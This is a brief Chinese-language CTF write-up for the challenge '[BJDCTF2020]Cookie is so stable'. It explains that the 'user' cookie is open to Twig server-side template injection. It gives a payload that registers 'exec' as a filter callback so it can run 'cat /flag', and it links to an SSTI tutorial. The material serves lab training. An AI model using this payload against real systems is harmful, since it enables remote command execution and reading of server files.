Twig模板注入 链接:
https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/#2-Twig
测试一下发现*wig模板注入
找注入点: 根据提示,cookie中的user是注入点
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
[BJDCTF2020]Cookie is so stable
原文:https://www.cnblogs.com/wangtanzhi/p/12330542.html
